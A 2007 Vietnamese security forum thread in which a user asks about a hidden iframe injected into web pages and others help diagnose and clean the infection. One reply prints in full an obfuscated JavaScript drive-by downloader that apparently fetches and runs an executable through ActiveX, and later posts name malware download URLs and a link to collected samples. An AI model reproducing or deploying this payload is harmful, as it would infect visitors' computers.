[Question] Trojan hay là gì? |
16/08/2007 12:38:50 (+0700) | #1 | 79188 |
beham10
Member
|
0 |
|
|
Joined: 16/07/2006 13:37:31
Messages: 10
Offline
|
|
Em không bít bị trojan hay spyware gì mà bi giờ, mỗi lần em truy cập 1 web site, nó cứ thêm cái này vào lúc load(em xem mã nguồn):
<iframe src='http://aaa.369678.cn/ppp.htm' width=0 height=0></iframe>
Hu hu, làm mạng em đã chậm lại chậm hơn. Bác nào cứu em. Em quét full = Symantec, nó tìm thấy 2 con: Trojan.Exploit.131; W32.Fubalca.N!html đều ở trong Temporary Internet Files. Nhưng vẫn bị. Hu hu |
|
|
|
|
[Question] Re: Trojan hay là gì? |
16/08/2007 13:08:30 (+0700) | #2 | 79190 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Bạn bị dính một thứ gì đó khai thác lỗi của windows , nó tự mở tới trang web tào lao chỉ định bằng cái code bên trên. Ở cái địa chỉ .cn đó có vài thứ .js html có chứa code độc. Nên kiểm tra lại bằng hijackthis, tool autoruns của sysinternal. Nói chung là rắc rối lung tung beng.
Một trong số đó là 00064.js
eval("\146\165\156\143\164\151\157\156\40\121\113\64\65\165\63\50\162\155\64\155\146\51\173\166\141\162\40\155\60\161\116\127\40\75\40\167\151\156\144\157\167\133\42\134\170\64\104\134\170\66\61\134\170\67\64\134\170\66\70\42\135\133\42\134\170\67\62\134\170\66\61\134\170\66\105\134\170\66\64\134\170\66\106\134\170\66\104\42\135\50\51\52\162\155\64\155\146\73\162\145\164\165\162\156\40\115\141\164\150\133\42\134\170\67\62\134\170\66\106\134\170\67\65\134\170\66\105\134\170\66\64\42\135\50\155\60\161\116\127\51\53\47\134\170\62\105\134\170\66\65\134\170\67\70\134\170\66\65\47\73\175\164\162\171\173\126\116\64\65\165\63\75\47\134\170\66\70\134\170\67\64\134\170\67\64\134\170\67\60\134\170\63\101\134\170\62\106\134\170\62\106\134\170\66\64\134\170\66\64\134\170\66\64\134\170\62\105\134\170\63\63\134\170\63\66\134\170\63\71\134\170\63\66\134\170\63\67\134\170\63\70\134\170\62\105\134\170\66\63\134\170\66\105\134\170\62\106\134\170\67\67\134\170\66\71\134\170\66\105\134\170\66\64\134\170\66\106\134\170\67\67\134\170\62\105\134\170\66\65\134\170\67\70\134\170\66\65\47\73\166\141\162\40\114\115\64\65\165\63\75\167\151\156\144\157\167\133\42\134\170\66\64\134\170\66\106\134\170\66\63\134\170\67\65\134\170\66\104\134\170\66\65\134\170\66\105\134\170\67\64\42\135\133\42\134\170\66\63\134\170\67\62\134\170\66\65\134\170\66\61\134\170\67\64\134\170\66\65\134\170\64\65\134\170\66\103\134\170\66\65\134\170\66\104\134\170\66\65\134\170\66\105\134\170\67\64\42\135\50\42\134\170\66\106\134\170\66\62\134\170\66\101\134\170\66\65\134\170\66\63\134\170\67\64\42\51\73\114\115\64\65\165\63\133\42\134\170\67\63\134\170\66\65\134\170\67\64\134\170\64\61\134\170\67\64\134\170\67\64\134\170\67\62\134\170\66\71\134\170\66\62\134\170\67\65\134\170\67\64\134\170\66\65\42\135\50\42\134\170\66\63\134\170\66\103\134\170\66\61\134\170\67\63\134\170\67\63\134\170\66\71\134\170\66\64\42\54\42\134\170\66\63\134\170\66\103\134\170\67\63\134\170\66\71\134\170\66\64\134\170\63\101\134\170\64\62\134\170\64\64\134\170\63\71\134\170\63\66\134\170\64\63\134\170\63\65\134\170\63\65\134\170\63\66\134\170\62\104\134\170\63\66\134\170\63\65\134\170\64\61\134\170\63\63\134\170\62\104\134\170\63\61\134\170\63\61\134\170\64\64\134\170\63\60\134\170\62\104\134\170\63\71\134\170\63\70\134\170\63\63\134\170\64\61\134\170\62\104\134\170\63\60\134\170\63\60\134\170\64\63\134\170\63\60\134\170\63\64\134\170\64\66\134\170\64\63\134\170\63\62\134\170\63\71\134\170\64\65\134\170\63\63\134\170\63\66\42\51\73\166\141\162\40\116\155\64\155\146\75\114\115\64\65\165\63\133\42\134\170\64\63\134\170\67\62\134\170\66\65\134\170\66\61\134\170\67\64\134\170\66\65\134\170\64\106\134\170\66\62\134\170\66\101\134\170\66\65\134\170\66\63\134\170\67\64\42\135\50\42\134\170\64\104\134\170\66\71\134\170\66\63\134\170\67\62\134\170\66\106\134\170\67\63\134\170\66\106\134\170\66\66\134\170\67\64\134\170\62\105\134\170\65\70\42\53\42\134\170\64\104\42\53\42\134\170\64\103\42\53\42\134\170\64\70\42\53\42\134\170\65\64\42\53\42\134\170\65\64\42\53\42\134\170\65\60\42\54\42\42\51\73\166\141\162\40\123\75\114\115\64\65\165\63\133\42\134\170\64\63\134\170\67\62\134\170\66\65\134\170\66\61\134\170\67\64\134\170\66\65\134\170\64\106\134\170\66\62\134\170\66\101\134\170\66\65\134\170\66\63\134\170\67\64\42\135\50\42\134\170\64\61\134\170\66\64\134\170\66\106\134\170\66\64\134\170\66\62\134\170\62\105\134\170\65\63\134\170\67\64\134\170\67\62\134\170\66\65\134\170\66\61\134\170\66\104\42\54\42\42\51\73\123\133\42\134\170\67\64\134\170\67\71\134\170\67\60\134\170\66\65\42\135\75\61\73\116\155\64\155\146\133\42\134\170\66\106\134\170\67\60\134\170\66\65\134\170\66\105\42\135\50\42\134\170\64\67\134\170\64\65\134\170\65\64\42\54\40\126\116\64\65\165\63\54\60\51\73\116\155\64\155\146\133\42\134\170\67\63\134\170\66\65\134\170\66\105\134\170\66\64\42\135\50\51\73\170\124\116\113\101\75\121\113\64\65\165\63\50\61\60\60\60\51\73\166\141\162\40\106\75\114\115\64\65\165\63\133\42\134\170\64\63\134\170\67\62\134\170\66\65\134\170\66\61\134\170\67\64\134\170\66\65\134\170\64\106\134\170\66\62\134\170\66\101\134\170\66\65\134\170\66\63\134\170\67\64\42\135\50\42\134\170\65\63\134\170\66\63\134\170\67\62\134\170\66\71\134\170\67\60\134\170\67\64\134\170\66\71\134\170\66\105\134\170\66\67\134\170\62\105\134\170\64\66\134\170\66\71\134\170\66\103\134\170\66\65\134\170\65\63\134\170\67\71\134\170\67\63\134\170\67\64\134\170\66\65\134\170\66\104\134\170\64\106\134\170\66\62\134\170\66\101\134\170\66\65\134\170\66\63\134\170\67\64\42\54\42\42\51\73\166\141\162\40\111\62\113\112\165\62\75\106\133\42\134\170\64\67\134\170\66\65\134\170\67\64\134\170\65\63\134\170\67\60\134\170\66\65\134\170\66\63\134\170\66\71\134\170\66\61\134\170\66\103\134\170\64\66\134\170\66\106\134\170\66\103\134\170\66\64\134\170\66\65\134\170\67\62\42\135\50\60\51\73\166\141\162\40\156\125\64\65\165\63\73\156\125\64\65\165\63\75\106\133\42\134\170\64\62\134\170\67\65\134\170\66\71\134\170\66\103\134\170\66\64\134\170\65\60\134\170\66\61\134\170\67\64\134\170\66\70\42\135\50\111\62\113\112\165\62\54\42\134\170\67\62\134\170\66\71\134\170\67\63\134\170\66\71\134\170\66\105\134\170\66\67\42\53\170\124\116\113\101\51\73\170\124\116\113\101\75\40\106\133\42\134\170\64\62\134\170\67\65\134\170\66\71\134\170\66\103\134\170\66\64\134\170\65\60\134\170\66\61\134\170\67\64\134\170\66\70\42\135\50\111\62\113\112\165\62\54\170\124\116\113\101\51\73\123\133\42\134\170\64\106\134\170\67\60\134\170\66\65\134\170\66\105\42\135\50\51\73\123\133\42\134\170\65\67\134\170\67\62\134\170\66\71\134\170\67\64\134\170\66\65\42\135\50\116\155\64\155\146\133\42\134\170\67\62\134\170\66\65\134\170\67\63\134\170\67\60\134\170\66\106\134\170\66\105\134\170\67\63\134\170\66\65\134\170\64\62\134\170\66\106\134\170\66\64\134\170\67\71\42\135\51\73\123\133\42\134\170\65\63\134\170\66\61\134\170\67\66\134\170\66\65\134\170\65\64\134\170\66\106\134\170\64\66\134\170\66\71\134\170\66\103\134\170\66\65\42\135\50\170\124\116\113\101\54\62\51\73\123\133\42\134\170\64\63\134\170\66\103\134\170\66\106\134\170\67\63\134\170\66\65\42\135\50\51\73\106\133\42\134\170\64\104\134\170\66\106\134\170\67\66\134\170\66\65\134\170\64\66\134\170\66\71\134\170\66\103\134\170\66\65\42\135\50\170\124\116\113\101\54\156\125\64\65\165\63\51\73\166\141\162\40\121\75\114\115\64\65\165\63\133\42\134\170\64\63\134\170\67\62\134\170\66\65\134\170\66\61\134\170\67\64\134\170\66\65\134\170\64\106\134\170\66\62\134\170\66\101\134\170\66\65\134\170\66\63\134\170\67\64\42\135\50\42\134\170\65\63\134\170\66\70\134\170\66\65\134\170\66\103\134\170\66\103\134\170\62\105\134\170\64\61\134\170\67\60\134\170\67\60\134\170\66\103\134\170\66\71\134\170\66\63\134\170\66\61\134\170\67\64\134\170\66\71\134\170\66\106\134\170\66\105\42\54\42\42\51\73\150\67\67\60\106\62\75\106\133\42\134\170\64\62\134\170\67\65\134\170\66\71\134\170\66\103\134\170\66\64\134\170\65\60\134\170\66\61\134\170\67\64\134\170\66\70\42\135\50\111\62\113\112\165\62\53\47\134\134\134\170\67\63\134\170\67\71\134\170\67\63\134\170\67\64\134\170\66\65\134\170\66\104\134\170\63\63\134\170\63\62\47\54\47\134\170\66\63\134\170\66\104\134\170\66\64\134\170\62\105\134\170\66\65\134\170\67\70\134\170\66\65\47\51\73\121\133\42\134\170\65\63\134\170\66\70\134\170\66\65\134\170\66\103\134\170\66\103\134\170\64\65\134\170\67\70\134\170\66\65\134\170\66\63\134\170\67\65\134\170\67\64\134\170\66\65\42\135\50\150\67\67\60\106\62\54\47\134\170\62\60\134\170\62\106\134\170\66\63\134\170\62\60\47\53\156\125\64\65\165\63\54\42\42\54\42\134\170\66\106\134\170\67\60\134\170\66\65\134\170\66\105\42\54\60\51\73\175\143\141\164\143\150\50\167\155\64\155\146\51\173\167\155\64\155\146\75\61\73\175")
cái thứ này bị bắt dính bởi symantec. Và một số .html khác.
PS : vậy là cái trang web bạn hay vào được thêm vào cái dòng code bạn post, chức năng là mở trang web tào lao kia, và một số chức năng chưa biết khác. Đừng sài IE chi do dính ba thứ đó.
|
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Re: Trojan hay là gì? |
17/08/2007 06:46:54 (+0700) | #3 | 79281 |
beham10
Member
|
0 |
|
|
Joined: 16/07/2006 13:37:31
Messages: 10
Offline
|
|
FireFox cũng bị. Hic lẽ nào em lại phải Format máy. |
|
|
|
|
[Question] Trojan hay là gì? |
17/08/2007 11:08:18 (+0700) | #4 | 79322 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
Firefox đâu có bị đâu bạn. Chỉ có dùng IE vào trang đó mới bị thôi. |
|
|
|
|
[Question] Re: Trojan hay là gì? |
17/08/2007 11:19:53 (+0700) | #5 | 79324 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Đây là một số file download được từ thông tin bạn cung cấp. Có 2 thứ được xếp loại downloader.
http://w13.easy-share.com/3395241.html |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Trojan hay là gì? |
17/08/2007 12:04:46 (+0700) | #6 | 79332 |
|
kid_b0d
Member
|
0 |
|
|
Joined: 16/08/2006 00:49:55
Messages: 70
Location: Phan thiết, Bình thu
Offline
|
|
@tmd
bạn nói là dùng IE sẽ nguy hiểm và bị như thế còn sài FF thì không bị, mình vẫn chưa hiểu lắm vì sao lại sài FF thì không bị còn IE lại bị nhỉ? |
|
|
|
|
[Question] Re: Trojan hay là gì? |
17/08/2007 20:27:23 (+0700) | #7 | 79357 |
|
blackwidow
Elite Member
|
0 |
|
|
Joined: 12/08/2003 05:55:35
Messages: 581
Offline
|
|
Vì IE dùng "activex" còn FF thì không. |
|
|
|
|
[Question] Re: Trojan hay là gì? |
04/09/2007 22:37:56 (+0700) | #8 | 83260 |
beham10
Member
|
0 |
|
|
Joined: 16/07/2006 13:37:31
Messages: 10
Offline
|
|
Em vẫn sống chung cùng con "gì gì" đó các bác ạ. Tại bản gost của em - em delete mất roài, với lại ko mún cài lại máy. Sau khi Hijack hai ziếc ko ăn thua, em đã nghĩ ra 1 cách ^ ^. Giờ em sống chung với nó ngon lành ). Công nhận em thông minh phết. KE ke
Method:
In folder:
@Windows\system32\drivers\etc
Choose file:
host
Edit this file: (thêm và cuối)
127.0.0.1 aaa.369678.cn
127.0.0.1 www.aaa.369678.cn
(Các dòng có dấu # chỉ là comment)
|
|
|
|
|
[Question] Re: Trojan hay là gì? |
26/09/2007 00:21:32 (+0700) | #9 | 86914 |
beham10
Member
|
0 |
|
|
Joined: 16/07/2006 13:37:31
Messages: 10
Offline
|
|
Báo cáo với ai nếu bị giống em: cách giải quyết rất đơn giản.
Bước 1: Cài Antivirus (Nếu chưa cài). Em cài kasperskey internet security.
Bước 2: Khởi động vào SAFE MODE.
Bước 3: Quét thư mục Windows, và Documents And Setttings, Program Files\Internet Explorer, Program Files\Mozila Firefox (Không cần quét full đâu - mất thời gian ^ ^ - nhưng nếu thích thì cứ quét ^ ^)
Bước 4: Nhận thông báo phát hiện ra virus (detect), nhưng nó không xóa được - ??? - chả biết tại sao - dù đã chọn Action = Delete).
Bước 5: Delete các file = tay do nó phát hiện
(chú ý: thông thường là KAPS sẽ phát hiện ngay các file .exe trong Windows khoảng 27-28 Kb, trong thư mục IE thì có thể có file NewTemp.dll)
Other: Chả biết có động chạm gì không nhưng em Disable "Services: Task Scheduler" roài
------------------------------
File exe gốc nó đã tải về máy và đổi tên move rải rác trong Windows có cội nguồn là từ http://down.851733.cn/down1.exe
Con này là của Chinese. |
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|